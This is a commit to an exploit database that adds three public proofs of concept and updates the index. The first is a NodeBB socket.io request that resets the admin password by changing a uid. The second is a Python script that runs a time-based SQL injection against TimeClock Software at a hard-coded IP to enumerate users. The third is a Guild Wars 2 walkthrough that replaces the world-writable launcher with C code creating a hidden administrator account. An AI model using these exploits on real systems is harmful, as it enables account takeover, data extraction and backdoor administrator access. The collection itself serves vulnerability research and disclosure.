DB: 2020-10-15

3 changes to exploits/shellcodes

Guild Wars 2 - Insecure Folder Permissions

TimeClock Software 0.995 - Multiple SQL Injections
TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections
TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection
NodeBB Forum 1.12.2-1.14.2 - Account Takeover
This commit is contained in:
Offensive Security 2020-10-15 05:02:06 +00:00
parent 973a669c08
commit a3aad6c41a
4 changed files with 182 additions and 1 deletions

View file

@ -0,0 +1,21 @@
# Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover
# Date: 2020-08-18
# Exploit Author: Muhammed Eren Uygun
# Vendor Homepage: https://nodebb.org/
# Software Link: https://github.com/NodeBB/NodeBB
# Version: 1.12.2-1.14.2
# Tested on: Linux
# CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7
Impact:
----------------------
A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover.
Bug PoC:
----------------------
Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4
1- Create a user
2- Go to password change page
3- Change password with proxy
427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)])
4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request.
5- So you can login with this password to admin user.

50
exploits/php/webapps/48874.py Executable file
View file

@ -0,0 +1,50 @@
#!/usr/bin/python3
# Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection
# Date: July 21, 2020
# Exploit Author: François Bibeau
# Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90
# Vendor Homepage: http://timeclock-software.net/
# Software Link: http://timeclock-software.net/timeclock-download.php
# Version: 1.01
# Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache
import time
import requests
login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target
login_data = {'username':'fred','password':'fred','submit':'Log In'}
headers = {'User-Agent': 'Mozilla/5.0'}
# init session & login
session = requests.Session()
session.post(login_url,headers=headers,data=login_data)
# static list provided for PoC, could use a text file
users = ['john','bill','tim','fred','garry','sid','admin']
for user in users:
url = "http://159.203.41.34/add_entry.php"
payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='"
data = {'data_month': '1',
'data_day': '1',
'data_year': '1',
'type_id': '5',
'hours': '1',
'notes': payload,
'submit': 'Add'}
print(f'Checking user {user}... ', end = '')
start = time.time()
response = session.post(url,data=data)
end = time.time()
delay = end - start
if delay > 5:
print('User found!')
else:
print('')

View file

@ -0,0 +1,107 @@
# Exploit Title: Guild Wars 2 - Insecure Folder Permissions
# Date: 2020-10-09
# Exploit Author: George Tsimpidas
# Software Link : https://account.arena.net/welcome
# Version Build : 106915
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
# Category: local
Vulnerability Description:
Guild Wars 2 Launcher (Gw2-64.exe) suffers from an elevation of privileges
vulnerability which can be used by a simple user that can change the
executable file
with a binary of choice. The vulnerability exist due to the improper
permissions,
with the 'F' flag (Full) for 'Everyone' group, making the entire directory
'Guild Wars 2' and its files and sub-dirs world-writable.
# Local Privilege Escalation Proof of Concept
D:\icacls "Guild Wars 2"
Guild Wars 2 Everyone:(F)
Everyone:(OI)(CI)(IO)(M,WDAC,WO,DC)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
## Insecure File Permission
D:\Guild Wars 2icacls Gw2-64.exe
Gw2-64.exe Everyone:(F)
Everyone:(I)(F)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
BUILTIN\Users:(I)(RX)
#0. Download & install
#1. Create low privileged user & change to the user
## As admin
C:\net user lowpriv Password123! /add
C:\net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None
#2. Move the Service EXE to a new name
D:\Guild Wars 2whoami
lowpriv
D:\Guild Wars 2move Gw2-64.exe Gw2-64.frey.exe
1 file(s) moved.
#3. Create malicious binary on kali linux
## Add Admin User C Code
kali# cat addAdmin.c
int main(void){
system("net user placebo mypassword /add");
system("net localgroup Administrators placebo /add");
WinExec("D:\\Guild Wars 2\\Gw2-64.frey.exe",0);
return 0;
}
## Compile Code
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Gw2-64.exe
#4. Transfer created 'Gw2-64' to the Windows Host
#5. Move the created 'Gw2-64' binary to the 'D:\Guild Wars 2' Folder
D:\Guild Wars 2move C:\Users\lowpriv\Downloads\Gw2-64.exe .
#6. Check that exploit admin user doesn't exists
D:\Guild Wars 2net user placebo
The user name could not be found
#6. Reboot the Computer
D:\Guild Wars 2shutdown /r
#7. Login & now start the Guild Wars 2 Game, back doored launcher will be
executed, and the user placebo will be created, and added to the
Administrators group.
C:\Users\lowprivnet user placebo | findstr /i "Membership Name" | findstr
/v "Full"
User name placebo
Local Group Memberships *Administrators *Users
Global Group memberships *None

View file

@ -10388,6 +10388,7 @@ id,file,description,date,author,type,platform,port
48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
48876,exploits/windows/local/48876.txt,"Guild Wars 2 - Insecure Folder Permissions",2020-10-14,"George Tsimpidas",local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@ -38881,7 +38882,7 @@ id,file,description,date,author,type,platform,port
39394,exploits/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation",2016-02-01,GraphX,webapps,multiple,80
39399,exploits/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery",2016-02-02,"Kaustubh G. Padwad",webapps,multiple,
39402,exploits/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",webapps,jsp,80
39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80
39405,exploits/jsp/webapps/39405.py,"Jive Forums 5.5.25 - Directory Traversal",2016-02-03,ZhaoHuAn,webapps,jsp,80
39407,exploits/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Persistent Cross-Site Scripting",2016-02-03,Portcullis,webapps,hardware,
39408,exploits/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",webapps,hardware,
@ -40692,6 +40693,8 @@ id,file,description,date,author,type,platform,port
48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php,
48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,
48875,exploits/multiple/webapps/48875.txt,"NodeBB Forum 1.12.2-1.14.2 - Account Takeover",2020-10-14,"Muhammed Eren Uygun",webapps,multiple,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.